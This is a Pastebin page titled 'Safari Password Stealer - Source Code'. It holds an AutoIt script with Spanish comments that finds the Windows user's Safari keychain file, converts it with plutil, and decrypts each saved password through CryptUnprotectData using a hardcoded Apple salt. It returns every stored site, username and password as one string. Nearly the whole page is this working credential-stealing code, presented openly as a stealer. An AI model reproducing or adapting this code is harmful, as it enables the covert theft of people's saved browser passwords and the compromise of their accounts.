FlyFar

Safari Password Stealer - Source Code

Jun 10th, 2023
122
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
AutoIt 4.79 KB | Cybersecurity | 0 0
  1. #cs ----------------------------------------------------------------------------
  2.  
  3.  AutoIt Version: 3.3.8.1
  4.  Author: Naker90 - 01-04-2015
  5.  
  6.  Script Function:
  7.     Recupera las contraseñas guardadas en el navegador Safari
  8.  
  9.  El funcionamiento del script esta todo explicado en el post de SecurityExploded (Exposing the Password Secrets of Apple Safari) del cual esta basado mi codigo.
  10.  http://securityxploded.com/safari-password-secrets.php
  11.  
  12.  La funcion retorna una cadena delimitada por "//" entre las distintas credenciales y "--" para delimitar el usuario y la contraseña
  13.  
  14.  Ejemplo de retorno:
  15.     Web(Usuario)--Contraseña//Web2(Usuario2)--Contraseña2
  16.  
  17.  Saludos ;)
  18.  
  19. #ce ----------------------------------------------------------------------------
  20.  
  21. #include <String.au3>
  22.  
  23. Func SafariRecoveryPasswords()
  24.  
  25.     Const $SALT = '0x1DACA8F8D3B8483E487D3E0A6207DD26E6678103E7B213A5B079EE4F0F4115ED7B148CE54B460DC18EFED6E72775068B4900DC0F30A09EFD0985F1C8AA75C108' & _
  26.             '057901E297D8AF8038600B710E6853772F0F61F61D8E8F5CB23D2174404BB5066EAB7ABD8BA97E328F6E0624D929A4A5BE2623FDEEF14C0F745E58FB9174EF91' & _
  27.             '636F6D2E6170706C652E536166617269'
  28.     Const $DATA_BLOB = 'dword cbData;ptr pbData' ;cbData = Tamaño en bytes -- pbData = Puntero hacia los datos.
  29.     Const $OS = @OSVersion
  30.  
  31.     Local $KeyPath
  32.     If $OS = 'WIN_XP' Then
  33.         $KeyPath = 'C:\Documents and Settings\' & @UserName & '\Application Data\Apple Computer\Preferences\keychain.plist'
  34.     Else
  35.         $KeyPath = 'C:\Users\' & @UserName & '\AppData\Roaming\Apple Computer\Preferences\keychain.plist'
  36.     EndIf
  37.  
  38.     If FileExists(@TempDir & '\Pass.xml') Then FileDelete(@TempDir & '\Pass.xml')
  39.  
  40.     ShellExecuteWait(@ProgramFilesDir & '\Safari\Apple Application Support\plutil.exe', '-convert xml1 -s -o ' & @TempDir & '\Pass.xml ' & Chr(34) & $KeyPath & Chr(34), '', '', 0)
  41.  
  42.     Local $XmlObject = ObjCreate('Msxml2.DOMDocument.3.0')
  43.     $XmlObject.async = 0
  44.     $XmlObject.load(@TempDir & '\Pass.xml')
  45.  
  46.     Local $XmlElementString = $XmlObject.getElementsByTagName('string')
  47.  
  48.     If $XmlElementString.length <> 0 Then
  49.  
  50.         Local $Users = ''
  51.         For $i = 3 To $XmlElementString.length - 1
  52.             $Users &= $XmlElementString.item($i).text & '\\'
  53.             $i += 5
  54.         Next
  55.  
  56.         Local $XmlElementData = $XmlObject.getElementsByTagName('data')
  57.  
  58.         Local $PasswordList = ''
  59.         For $i = 0 To $XmlElementData.length - 1
  60.  
  61.             Local $Base64Element = $XmlObject.createElement('Base64Decode')
  62.             $Base64Element.dataType = 'bin.base64'
  63.             $Base64Element.text = $XmlElementData.item($i).text
  64.  
  65.             Local $Base64Decode = $Base64Element.nodeTypedValue
  66.  
  67.             ;------------------------------------------------------------------------------------
  68.             ;Estructuras para los datos de entrada -- DATA BLOB
  69.  
  70.             Local $DataInSize = BinaryLen($Base64Decode)
  71.  
  72.             Local $DataInStruct = DllStructCreate('byte[' & $DataInSize & ']')
  73.             DllStructSetData($DataInStruct, 1, $Base64Decode)
  74.  
  75.             Local $DataInBlob = DllStructCreate($DATA_BLOB)
  76.             DllStructSetData($DataInBlob, 1, $DataInSize)
  77.             DllStructSetData($DataInBlob, 2, DllStructGetPtr($DataInStruct))
  78.  
  79.             ;------------------------------------------------------------------------------------
  80.  
  81.             ;------------------------------------------------------------------------------------
  82.             ;Estructura para la contraseña -- DATA BLOB
  83.  
  84.             Local $PwdSize = BinaryLen($SALT)
  85.  
  86.             Local $PwdStruct = DllStructCreate('byte[' & $PwdSize & ']')
  87.             DllStructSetData($PwdStruct, 1, $SALT)
  88.  
  89.             Local $PwdDataBlob = DllStructCreate($DATA_BLOB)
  90.             DllStructSetData($PwdDataBlob, 1, $PwdSize)
  91.             DllStructSetData($PwdDataBlob, 2, DllStructGetPtr($PwdStruct))
  92.  
  93.             ;------------------------------------------------------------------------------------
  94.  
  95.             Local $DataOutStruct = DllStructCreate($DATA_BLOB)
  96.  
  97.             Local $CryptDllOpen = DllOpen('Crypt32.dll')
  98.             Local $UnprotectData = DllCall($CryptDllOpen, 'bool', 'CryptUnprotectData', _
  99.                     'struct*', $DataInBlob, _
  100.                     'ptr*', 0, _
  101.                     'ptr', DllStructGetPtr($PwdDataBlob), _
  102.                     'ptr', 0, _
  103.                     'ptr', 0, _
  104.                     'dword', 0, _
  105.                     'struct*', $DataOutStruct)
  106.  
  107.             If $UnprotectData[0] = False Then Return 0
  108.  
  109.             Local $PasswordStruct = DllStructCreate('byte[' & DllStructGetData($DataOutStruct, 1) & ']', DllStructGetData($DataOutStruct, 2))
  110.             Local $PasswordHex = StringTrimLeft(Hex(DllStructGetData($PasswordStruct, 1)), 8)
  111.  
  112.             While StringRight($PasswordHex, 1) = '0'
  113.                 $PasswordHex = StringTrimRight($PasswordHex, 1)
  114.             WEnd
  115.  
  116.             Local $Password = _HexToString($PasswordHex)
  117.  
  118.             $PasswordList &= $Password & '\\'
  119.  
  120.         Next
  121.  
  122.         Local $UserSplit = StringSplit($Users, '\\')
  123.         Local $PassSplit = StringSplit($PasswordList, '\\')
  124.  
  125.         Local $Return
  126.         For $i = 1 To UBound($UserSplit) - 1
  127.             $Return &= $UserSplit[$i] & '--' & $PassSplit[$i] & '//'
  128.         Next
  129.  
  130.         Return $Return
  131.  
  132.     Else
  133.  
  134.         Return 0
  135.  
  136.     EndIf
  137.  
  138. EndFunc   ;==>SafariRecoveryPasswords
Add Comment
Please, Sign In to add comment